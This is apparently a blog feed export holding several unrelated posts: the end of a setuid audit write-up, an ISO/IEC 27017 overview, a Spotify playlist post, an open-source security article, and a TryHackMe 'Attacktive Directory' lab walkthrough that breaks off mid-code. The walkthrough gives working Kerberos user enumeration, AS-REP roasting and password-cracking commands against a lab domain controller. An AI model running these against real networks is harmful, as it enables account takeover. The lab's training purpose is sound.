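    special bit is set but execute is not (a common misconfiguration)."""
    if len(mode) != 10:
        raise ValueError(f"bad mode string: {mode!r}")
    u, g, o = mode[3], mode[6], mode[9]  # execute positions of user/group/other
    return {
        "type": mode[0],
        "setuid": u in "sS",
        "setgid": g in "sS",
        "sticky": o in "tT",
        "owner_exec": u in "xs",
        "group_exec": g in "xs",
        "other_exec": o in "xt",
    }


def parse_ls_line(line):
    """Return mode flags, owner, group and path for one `ls -l` line, else None."""
    m = LS_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec.update(parse_mode(rec["mode"]))
    return rec


# Constructed allowlist: setuid-root binaries expected on this kind of host.
# Anything else with the bit set deserves a ticket, not a shrug.
ALLOWED_SETUID_ROOT = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
}


def audit_setuid(lines, allowlist=ALLOWED_SETUID_ROOT):
    """Return paths of root-owned setuid files that are not on the allowlist."""
    unexpected = []
    for line in lines:
        rec = parse_ls_line(line)
        if rec and rec["setuid"] and rec["owner"] == "root" and rec["path"] not in allowlist:
            unexpected.append(rec["path"])
    return unexpected


# Constructed listing (sizes and dates made up except for the nmap line).
SAMPLE_LISTING = [
    "-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap",
    "-rwsr-xr-x 1 root root  47032 Feb 16  2015 /usr/bin/passwd",
    "-rwsr-xr-x 1 root root  40128 Feb 16  2015 /bin/mount",
    "-rwxr-sr-x 1 root tty   18784 Feb 16  2015 /usr/bin/wall",
    "drwxrwxrwt 8 root root   4096 Oct  1 13:06 /tmp",
]

if __name__ == "__main__":
    print("unexpected setuid-root files:", audit_setuid(SAMPLE_LISTING))
```

On a live host the listing would come from `find / -user root -perm -4000 -exec ls -l {} \;` (the same find the write-up uses), and the allowlist from a freshly built reference image; a package in /usr/local, outside the distribution's package manager, is exactly the kind of entry this check is meant to surface.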

Let’s play with Nmap's interactive mode:

[screenshot: Nmap interactive mode session]

Okay... I’ll see you on another room! 🙋‍♂️


Thanks for reading this post, if you like my work you can support by buying me a coffee. ☕️

You can find my articles from SLIIT FOSS Community - Blog as well. 👨‍💻

]]>
<![CDATA[ISO/IEC 27017 — Extending ISO/IEC 27001 into the Cloud | BSI]]>https://shehansanjula.github.io/blog/extending-iso-iec-27001-into-the-cloud-bsi/63c3a82da4552e0055061046Sun, 12 Sep 2021 09:31:47 GMTISO/IEC 27017 — Extending ISO/IEC 27001 into the Cloud | BSI

Cloud customers are concerned about security—it remains a key reason why organizations hesitate to adopt cloud services despite the flexibility and scalability the cloud can offer. A key concern focuses on the ability of Cloud Service Providers (CSPs) to treat customer data with sufficient care and attention.

The main elements of this are the worries that data could end up in the wrong hands and what control does a customer have over careless operators. But there are other concerns too: issues such as customer identity, segregation of assets on virtual servers and what happens to assets in the event of a CSP going out of business are also issues that play on potential cloud users’ minds.

The ISO 27001 series addresses some of these concerns, but a newer standard, ISO/IEC 27017 Information technology — Security techniques, goes further and offers more peace of mind for potential cloud customers. Typical cloud and technical standards address controls and guidance aimed at the cloud service provider only. What's unique and extremely helpful about ISO/IEC 27017 is that it provides both the CSP and the cloud service customer with guidance and advice. In addition to ensuring services are safe, ISO/IEC 27017 also aims to educate customers on what they should want from their host in the cloud.

The standard provides cloud-specific guidance on 37 of the controls in ISO/IEC 27002 and also adds 7 new controls:

  • CLD.6.3.1: Agreement on shared or divided responsibilities between the customer and provider around information security roles associated with cloud services has to be clearly laid out, recorded and communicated.
  • CLD.8.1.5: Addresses how assets are returned or removed from the cloud when the contract/agreement between the customer and provider is terminated.
  • CLD.9.5.1: The provider has to protect and separate the customer’s virtual environment from other customers and external parties.
  • CLD.9.5.2: The customer and provider must ensure virtual machines are configured and hardened to meet the needs of the organization.
  • CLD.12.1.5: Covers the customer’s responsibility to define, document and monitor the administrative operations and procedures associated with the cloud environment, and the CSP’s requirement to share documentation about critical operations and procedures as and when customers require it.
  • CLD.12.4.5: How the capabilities of the provider enable the customer to monitor activity within a cloud computing environment.
  • CLD.13.1.4: Consistent configurations should be made so that the virtual network environment is in line with the information security policy of the physical network.

Roles and responsibilities

Ambiguity in roles and the definition and allocation of responsibilities related to issues such as data ownership, access control, and infrastructure maintenance can give rise to business or legal disputes; especially when dealing with third parties. As the standard states:

Data and files on the cloud service provider's systems created or modified during the use of the cloud service can be critical to the secure operation, recovery and continuity of the service. The ownership of all assets, and the parties who have responsibilities for operations associated with these assets, such as backup and recovery operations, should be defined and documented. Otherwise, there is a risk that the cloud service provider assumes that the cloud service customer performs these vital tasks (or vice versa), and a loss of data can occur.

Essentially, the standard requires that it’s clearly laid out which party is responsible for what from the outset.

Security controls

It’s not only the separation of responsibilities that the standard helps define: ISO/IEC 27017 also goes into much more detail about the type of security controls that service providers should be implementing – helping reduce the barriers to cloud adoption.

ISO/IEC 27017 offers a way for cloud service providers to indicate the level of controls that have been implemented. This means documented evidence—backed up by independent sources like certification to certain standards—shows that appropriate policies have been implemented and, most importantly, what types of controls have been introduced. This information should be shared with the cloud customer before any contract is signed, to help head off potential issues in the future.

In cases where independent audits aren’t practical or would pose a greater risk to information security, the standard does provide an option for CSPs to self-assess. When this is the case, the CSP must tell customers that they have self-assessed.

Cryptography

There’s also guidance about any cryptography being used. This applies to the customer and the provider, as both have responsibilities in this area. The provider should tell the customer how it’s using cryptography and help customers apply protection of their own. It should also consider special cases, such as health data, where there may be additional regulatory guidelines.

Customers should also be upfront about the type of cryptography that they’re using – and they ought to be using cryptography if the risk analysis suggests that it’s needed. In fact, this is the sort of dispute or misunderstanding that underpins the need for the standard. Not only should both parties assure each other that the network is being protected, but they should also be able to assure each other that the two systems are compatible. And, crucially, it should be determined whether these controls apply to data at rest, in transit or both, as this has caused misunderstandings before.

Customer relationship

The standard extends requirements beyond technology and also lays out guidelines for training. Many customers are happy about cloud providers’ infrastructure but are wary about the level of support.

There is, after all, plenty of evidence to suggest employees are often the weak point in any organization’s security measures. It’s not just faulty security devices that customers need to be wary of, but rather whether staff are following all of the appropriate measures. The new standard not only sets out that providers should be supplying awareness and training for employees and contractors, but also stipulates that the training should cover regulatory requirements, customer access and specific requests.

Asset ownership

Who owns what in the cloud can be a point of confusion. The standard suggests that there be an inventory made of assets that are stored in the cloud and also refers back to the guidance information specified in ISO/IEC 27002 on the ownership, acceptable use of and return of assets. The new standard also lays out parameters for the safe disposal of customer assets so that sensitive data isn’t simply dumped in virtual dustbins.

Who benefits?

The simple answer is: everyone. Well, everyone associated with the cloud.

The road to the cloud can be paved with misunderstandings and apprehension. Any organization entrusting sensitive customer data to a third party has come to know there are grey areas where rights and responsibilities have not been clearly defined. There’s a lot that’s been taken on trust and that’s not necessarily the best recipe for success.

CIOs and IT managers will be encouraged by the changes to their relationships with CSPs supported by the standard as they introduce a real degree of assurance to cloud computing security. Overview and implementation training around ISO/IEC 27017 may prove to be very helpful as an organization makes decisions about adopting cloud and which partners are suited to their needs.

CSPs that choose to implement ISO/IEC 27017 will also benefit by knowing they’re offering a secure solution that their customers can trust, which goes a long way in building a cloud-based relationship. And, of course, by working with their customers through the adoption process, CSPs implementing ISO/IEC 27017 protect themselves from harmful accusations or lawsuits that could disrupt their business and damage their brand.


Source:
The British Standards Institution, "ISO/IEC 27017" | bsigroup.com

]]>
<![CDATA[The best songs of all time | Spotify]]>https://shehansanjula.github.io/blog/the-best-songs-of-all-time/63c3a82da4552e0055061044Tue, 31 Aug 2021 02:05:37 GMT

As you know, I have been serving as an official Musixmatch curator for Sri Lanka for quite a long time now.

Shehan Sanjula’s profile on Musixmatch
The best songs of all time | Spotify

Apart from being an active member of the Musixmatch platform, I always wanted to contribute to society. As a result, I made a public playlist that contains the best songs of all time. It will save the time that you used to search top music albums. And it's free... you just need to follow the playlist! 😉

The most listened songs around the world!

#Global #TopSongs

The best songs of all time | Spotify

💡
Currently, it has 300+ songs. (The list displayed above only contains the first 100 [by date added], so I recommend you go through the complete list on Spotify.)

In here I categorized 🔥 these songs according to the following terms... 👇

  • 👉 Most listened 👈 🤗
  • 👉 Most viewed 👈 😋
  • 👉 Most popular 👈 😍
  • 👉 Top-rated 👈 🤠 and also according to the Top Rankings in popular music streaming sites (Musixmatch, Deezer, Pandora, Spotify, AppleMusic, YouTube Music, SamsungMusic, etc. 🎧)

✔️ There might be some popular songs you never heard before. 😮
✔️ So, I recommend checking out all these Music albums. 😊 🎶
✔️ These songs are mostly related to English, Latin, Spanish & Korean languages. 😎

💚
Note: I will keep continuing to add albums to this playlist. ✌️

#TopSongsEver #ShehanSanjula

#MostPopular #MostListened #MostViewed #TopRated #Spotify #Deezer #Pandora #Musixmatch #AppleMusic #SamsungMusic #YoutubeMusic

]]>
<![CDATA[Open-source components and their direction towards the future against cyber security aspects]]>https://shehansanjula.github.io/blog/open-source-components-and-their-direction-towards-the-future-against-cyber-security-aspects/63c3a82da4552e0055061042Sun, 22 Aug 2021 10:30:00 GMT

Open-source components are becoming major building blocks of the application economy. The software giants have moved into the open-source community in ways that were never previously imaginable. Microsoft loves Linux, IBM bought Red Hat, Oracle became the steward of the open-source Java platform and language… the list goes on. At the top of this ladder, companies like Google, Adobe, Oracle and Microsoft are some of the biggest supporters of open-source software. They have contributed to a range of open-source projects over the years.

Open-source software is a rapidly growing market. It is mainly because of its features. It allows any user to access the particular programming code. The user can get an idea of what the code’s functionality does by examining the source code. Apart from that, even users can modify the code to fit specific requirements or contribute to making the code even better.

Total global revenue in the open-source services market will reach over 17 billion U.S. dollars in 2019 and is expected to grow into a 30-billion-dollar industry by 2022, a number which would represent a tripling in size over the span of just five years. Source: Statista
Open-source components and their direction towards the future against cyber security aspects
Projected revenue of open-source services from 2017 to 2022 (in billion U.S. dollars)

According to a WhiteSource survey titled “The State of Open Source Vulnerabilities Management,”

  • 96.8% of developers reported that they use open-source components “all the time”, “very often” or “sometimes.”
  • Only 3.2% of developers reported that they did not use open source at all since some companies do not allow them to do so in their organizations due to policies.
  • Almost 97% rely on open-source components significantly, which explains why no one responds to their usage as “rarely.”
Open-source components and their direction towards the future against cyber security aspects

Now, let’s find out what the 2021 OSSRA report tells us about the state of open source in commercial software!

“The 2021 Open-Source Security and Risk Analysis” (OSSRA) report, produced by the Synopsys Cybersecurity Research Center (CyRC), examines the results of more than 1,500 audits of commercial codebases, performed by the Black Duck® Audit Services team.

The pandemic has brought explosive growth in both apps and vulnerabilities 📈

The COVID-19 pandemic has driven rapid growth in mobile app downloads, and with it the likelihood that open-source vulnerabilities are present in those apps. The “Peril in a Pandemic: State of Mobile Application Security” report shows that the number of open-source vulnerabilities increased in the audits reported in the 2021 OSSRA, and that increase is especially pronounced when looking at industry breakdowns.

Open-source components and their direction towards the future against cyber security aspects
Source: Synopsys, Inc.

Here are some critical insights from the 2021 OSSRA report:

  • 95% of the marketing tech codebases also contained open-source vulnerabilities.
  • 71% of the audited retail and e-commerce codebases contained vulnerabilities.
  • According to IBM’s 2020 Cost of a Data Breach report, the healthcare sector has moved into the top spot as the most attacked industry. OSSRA also confirms that both the financial services/fintech and the healthcare sectors had codebases with open-source vulnerabilities exceeding 60%.

No software is perfect… All computer software, whether open source or proprietary, has had bugs, currently has bugs, and will continue to have bugs — but we can minimize the volume and the severity of the bugs present, as well as their impact on the users or the business.

In the end…

The digital transformation we are witnessing today is largely due to the power of open-source components. Companies of all sizes, in all industry verticals, tend to use open source in their infrastructure at some point. Yet all that great power comes with great responsibility. Acknowledging these risks should be the first step, and investment in and maintenance of open-source security should continue. That includes continuous security testing and monitoring.

So, we have come to the end of our article. I hope you learned something from this article about open-source components and their security. Thank you, and let’s meet in another article. Stay safe and bye 👋.

]]>
<![CDATA[Attacktive Directory on TryHackMe]]>https://shehansanjula.github.io/blog/attacktive-directory-on-tryhackme/63c3a82da4552e0055061041Tue, 10 Aug 2021 12:48:08 GMT
Attacktive Directory - 99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?
Attacktive Directory on TryHackMe

In this article, we are going to solve the Attacktive Directory vulnerable machine from TryHackMe. This room has several numbered tasks to follow, so we'll follow them one by one. Along the way, I give you some points to read and understand a little more about the steps inside the challenge and the way I solved it. This room has three flags to retrieve from the target. 🙂

Difficulty: Medium

Basic overview

Active Directory (AD) is a Microsoft technology used to manage computers and other devices on a network. It is a primary feature of Windows Server, an operating system that runs both local and Internet-based servers. Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server.

The Active Directory structure includes three main tiers:

  1. domains
  2. trees
  3. forests

Several objects (users or devices) that all use the same database may be grouped into a single domain. Multiple domains can be combined into a single group called a tree. Multiple trees may be grouped into a collection called a forest. Each one of these levels can be assigned specific access rights and communication privileges.

Active Directory provides several different services, which fall under the umbrella of Active Directory Domain Services, or AD DS. These services include:

  1. Domain Services – stores centralized data and manages communication between users and domains; includes login authentication and search functionality.
  2. Certificate Services – creates, distributes, and manages secure certificates.
  3. Lightweight Directory Services – supports directory-enabled applications using the open Lightweight Directory Access Protocol (LDAP).
  4. Directory Federation Services – provides single-sign-on (SSO) to authenticate a user in multiple web applications in a single session.
  5. Rights Management – protects copyrighted information by preventing unauthorized use and distribution of digital content.
  6. DNS Service – Used to resolve domain names.

Enough talks 🥱, let's get started to hack. 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤 However, for educational explanation purposes, I had to reveal some answers to the given questions.

The first two tasks are about setting up the environment for the attack, and the remaining six are actual Enumeration to Exploitation to Escalation to Flag retrieval. If you have already connected to the target machine & installed Impacket, Bloodhound and Neo4j on your Kali machine, please skip task 1 & task 2 and directly move to task 3.

Task 1 - First Things First

Deploy the target machine. (This machine might take up to 3–5 minutes to load and be accessible)
There are two ways to access the deployed target machine.

  1. Use the AttackBox provided by TryHackMe. It comes with the necessary tools for attacking.
  2. Use the OpenVPN configuration file to connect your machine (Kali Linux) to their network.

For the sake of demonstration, I am using an OpenVPN connection on my Kali Linux machine.

Task 2 - Setup the environment

Here we are going to install the tools that are mentioned in task 2.

Installing Impacket:

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library. source: https://github.com/SecureAuthCorp/impacket

First, you will need to clone the Impacket Github repo onto your box. The following command will clone Impacket into /opt/impacket:

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

After the repo is cloned, you will notice several install-related files, requirements.txt and setup.py. A commonly skipped file during the installation is setup.py; this actually installs Impacket onto your system so you can use it and not have to worry about any dependencies.

To install the Python requirements for Impacket:

pip3 install -r /opt/impacket/requirements.txt

Once the requirements have finished installing, we can then run the python setup to install the script:

cd /opt/impacket/
sudo python3 setup.py install

Installing Bloodhound and Neo4j:

You can install it with the following command:

apt install bloodhound neo4j

Task 3 - Enumeration (DC Enumeration Pt.1)

This task consists of gathering information about the domain controller of the target machine. However, before we start enumerating, let's have a look at AD related services.

Background to AD-Related Ports

Active Directory communications involve a number of ports, some of which are more familiar to network and security administrators than others. These were outlined in the Active Directory Replication over Firewalls article by Steve Riley:

  • RPC endpoint mapper: port 135 TCP, UDP
  • NetBIOS name service: port 137 TCP, UDP
  • NetBIOS datagram service: port 138 UDP
  • NetBIOS session service: port 139 TCP
  • SMB over IP (Microsoft-DS): port 445 TCP, UDP
  • LDAP: port 389 TCP, UDP
  • LDAP over SSL: port 636 TCP
  • Global catalog LDAP: port 3268 TCP
  • Global catalog LDAP over SSL: port 3269 TCP
  • Kerberos: port 88 TCP, UDP
  • DNS: port 53 TCP, UDP
  • WINS resolution: port 1512 TCP, UDP
  • WINS replication: 42 TCP, UDP
  • RPC: Dynamically-assigned ports TCP, unless restricted

For a full listing of AD-related services, see Microsoft's support article 832017 Service Overview and Network Port Requirements for the Windows Server System.

As always, let’s start with the Nmap scan to gather information on our target.

nmap -sC -sV -oA nmap.attactive-open-ports 10.10.xxx.xxx
-sV : Service/version fingerprinting
-sC : Launch default NSE Nmap scripts
-oA : Output in all three formats (normal, grepable, XML) with the given basename

Here is the output 👇

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-10 23:28 EDT
Nmap scan report for 10.10.xxx.xxx
Host is up (0.32s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-11 03:28:27Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-08-11T03:28:43+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-08-10T03:13:56
|_Not valid after:  2022-02-09T03:13:56
|_ssl-date: 2021-08-11T03:28:53+00:00; +1s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-08-11T03:28:46
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.40 seconds

I counted 11, but apparently, this was incorrect. To double-check, I added | grep open at the end of my Nmap command.

nmap -sC -sV -oA nmap.attactive-open-ports 10.10.xxx.xxx | grep open
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-11 03:49:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services

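To double-check the port count from the scan above, here is an added Python helper (not code from the post or from TryHackMe) that parses nmap's normal output and tags each open port against the AD-related port list given earlier; the sample scan is the `| grep open` output shown above, embedded as a constant so the script runs offline.

```python
import re

# Ports the post lists as Active Directory related (the "Background to
# AD-Related Ports" list). Ports 42, 137, 138 and 1512 are kept even
# though this particular scan did not show them.
AD_PORTS = {
    42: "WINS replication",
    53: "DNS",
    88: "Kerberos",
    135: "RPC endpoint mapper",
    137: "NetBIOS name service",
    138: "NetBIOS datagram service",
    139: "NetBIOS session service",
    389: "LDAP",
    445: "SMB over IP (Microsoft-DS)",
    636: "LDAP over SSL",
    1512: "WINS resolution",
    3268: "Global catalog LDAP",
    3269: "Global catalog LDAP over SSL",
}

# One port line of nmap's normal output:
#   <port>/<proto>  <state>  <service>  [<version string>]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_open_ports(nmap_output):
    """Return one dict per 'open' port line; headers and script output are skipped."""
    found = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group(3) != "open":
            continue
        found.append({
            "port": int(m.group(1)),
            "proto": m.group(2),
            "service": m.group(4),
            "version": m.group(5).strip(),
        })
    return found


def summarize(nmap_output):
    """Count open ports and tag the ones on the AD list with their role."""
    ports = parse_open_ports(nmap_output)
    ad = [p for p in ports if p["port"] in AD_PORTS]
    return {
        "open": len(ports),
        "ad_related": len(ad),
        "ad_ports": {p["port"]: AD_PORTS[p["port"]] for p in ad},
        "other_ports": [p["port"] for p in ports if p["port"] not in AD_PORTS],
    }


# Sample input: the grep output lines shown in the post, embedded here
# so the script runs without a live scan.
SAMPLE_SCAN = """\
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-11 03:49:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
"""

if __name__ == "__main__":
    result = summarize(SAMPLE_SCAN)
    print(f"{result['open']} open ports, {result['ad_related']} AD-related")
    for port, role in sorted(result["ad_ports"].items()):
        print(f"  {port:>5}  {role}")
    print("  other:", result["other_ports"])
```
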
Out of the 13 ports showing, 9 of them are known ports associated with Active Directory. Now, let’s answer the questions. 🔍

  • Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
  • Port 445: Later versions of SMB (after Windows 2000) began to use port 445 directly on top of a TCP stack. Using TCP allows SMB to work over the internet.

SMB is a network communication protocol for providing shared access to files, printers, and serial ports between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows.

#useful command 
nmap -sC -p 139,445 -sV 10.10.xxx.xxx

Here is the output 👇

Attacktive Directory on TryHackMe

Also, we can use a well-known tool called enum4linux to enumerate 139/445 ports. Whenever ports 139 and 445 are open, I always start by using enum4linux to enumerate. To do so, we run:

enum4linux <ip> 2>/dev/null > attacktive-dir.e4l
        OR
enum4linux -a <ip>
2>/dev/null          -> Don’t show errors
> attacktive-dir.e4l -> Write output to file
-a                   -> Do all simple enumeration (-U -S -G -P -r -o -n -i).

It will return lots of information, including the NetBIOS Domain Name.

Here is the output 👇

Attacktive Directory on TryHackMe

Our Nmap scan previously revealed the Domain Name being spookysec.local

Attacktive Directory on TryHackMe

.local is often misused as a TLD (Top Level Domain).

What tool will allow us to enumerate port 139/445?
enum4linux
What is the NetBIOS-Domain Name of the machine?
THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
.local

Task 4 - Enumerating Users via Kerberos (DC Enumeration Pt. 2)

From the previous tasks, we gathered the hostname, domain name, ports and their services. As this room is about Active Directory challenges, we concentrate on the related ports/services, like Kerberos.

Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography.
source: MIT

A whole host of other services are running, including Kerberos. As we discussed, Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray! Kerberos port is open on the target machine (Port 88). We can try further enumeration with Kerbrute from now on.

Installing Kerbrute:

Download the binary from the Releases page of ropnop/kerbrute on GitHub.

Open a terminal and make the file executable by typing

chmod +x <filename>

You can rename the file to kerbrute for easy use. Copy the file in your /opt directory by typing in

mkdir /opt/kerbrute
cp kerbrute_linux_amd64 /opt/kerbrute/kerbrute

Now you can always find it in your /opt directory.

Now download the user list and password list by typing in the following:

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

Now, let’s answer the questions. 🔍

Kerbrute has a parameter userenum to enumerate valid usernames. We can run the following commands to get some information from kerbrute.

/opt/kerbrute/kerbrute -h

Here is the output 👇

Attacktive Directory on TryHackMe

There are a few things to do before we run Kerbrute user enumeration. The first is to add spookysec.local to our hosts file. When attacking Active Directory, I always put the domain in my hosts file.
Let’s put this in our /etc/hosts file since we are practising on a local network:

sudo nano /etc/hosts
Attacktive Directory on TryHackMe

To enumerate valid usernames from the userlist.txt provided to us, we can run the following command:

/opt/kerbrute/kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
--dc string         -> The location of the Domain Controller (KDC) to target.
-d, --domain string -> The full domain to use.
-t, --threads int   -> Threads to use.

Here is the output 👇

Attacktive Directory on TryHackMe

As you can see, a few valid usernames are available on the target domain. Out of all of them, 3 domain usernames interest us, and we will surely use these in further tasks.

  • svc-admin@spookysec.local
  • backup@spookysec.local
  • administrator@spookysec.local

What command within Kerbrute will allow us to enumerate valid usernames?
userenum
What notable account is discovered? (These should jump out at you)
svc-admin
What is the other notable account discovered? (These should jump out at you)
backup

Task 5 - Exploitation Abusing Kerberos

With all the information we have collected so far, we can exploit the Kerberos feature called ASREPRoasting.

AS-REP Roasting is an attack against Kerberos for user accounts that do not require pre-authentication. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account. This attack is explained nicely in this article.

We can use Impacket's GetNPUsers.py script to do some ASREPRoasting to determine if there’s an account we can query Kerberos tickets from without a password. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

Now let's get the ticket. 🤠

cd /opt/impacket/examples
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass

Great, we have the following result:

Attacktive Directory on TryHackMe

Let’s try this out with the other valid users we validated earlier:

python3 GetNPUsers.py spookysec.local/ -usersfile <file_dir>
Attacktive Directory on TryHackMe

As you can see from the result, we got a hash from one domain account, which does not require Kerberos pre-authentication. It means that, except for svc-admin, the other users do not seem vulnerable, or their accounts are disabled. We need to save this hash in a text file for cracking purposes, so let’s save the valid hash to a file called “hash.txt”. We can then attempt to crack this hash using the passwordlist provided in the challenge.

We can search generic hash types for the first part of the string (krb5asrep). It will reveal to us that the hash has the following type:

Attacktive Directory on TryHackMe
Generic hash types from hashcat hash type page
  • Hash mode: 18200
  • Hash name: Kerberos 5, etype 23, AS-REP

Cracking the Hash

Now, we crack this hash using either the hashcat application or the John the Ripper tool.

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking.
John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types, including for: user passwords of Unix flavors (Linux, *BSD, Solaris, AIX, QNX, etc.), macOS, Windows, "web apps" (e.g., WordPress), groupware (e.g., Notes/Domino), and database servers (SQL, LDAP, etc.); network traffic captures (Windows network authentication, WiFi WPA-PSK, etc.); encrypted private keys (SSH, GnuPG, cryptocurrency wallets, etc.), filesystems and disks (macOS .dmg files and "sparse bundles", Windows BitLocker, etc.), archives (ZIP, RAR, 7z), and document files (PDF, Microsoft Office's, etc.)
hashcat -a 0 -m 18200 hash.txt passwordlist.txt --force
-a    -> attack mode (0 = straight wordlist attack)
-m    -> hash type (18200 = Kerberos 5, etype 23, AS-REP)
        OR
sudo john --wordlist=passwordlist.txt hash.txt
(Here I am using John the Ripper)

Here is the output 👇

Attacktive Directory on TryHackMe

Now, let’s answer the questions. 🔍

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
svc-admin
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Kerberos 5 AS-REP etype 23
What mode is the hash?
18200
Now crack the hash with the modified password list provided, what is the user accounts password?
ma____05
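AS-REP roasting, as this task shows, only works against accounts with Kerberos pre-authentication turned off, and the hash it yields is the RC4 (etype 23) AS-REP that hashcat mode 18200 cracks. As an added defender-side check (not code from the post or from TryHackMe), this Python snippet audits which enabled accounts carry that setting in userAccountControl and flags TGT-request events that match the no-pre-auth / etype 23 combination; the account and event records are constructed samples, and the shortened event field names are an assumption of this example.

```python
# Bits of the Active Directory userAccountControl attribute (Microsoft's
# documented values); only the ones this check needs.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000


def accounts_without_preauth(accounts):
    """Return enabled sAMAccountNames whose userAccountControl has
    DONT_REQUIRE_PREAUTH set. Each one is an account for which a KDC will
    hand out an AS-REP without a password, so each should be justified
    or have pre-authentication re-enabled."""
    hits = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        disabled = bool(uac & UF_ACCOUNTDISABLE)
        if uac & UF_DONT_REQUIRE_PREAUTH and not disabled:
            hits.append(acct["sAMAccountName"])
    return hits


def roastable_tgt_requests(events):
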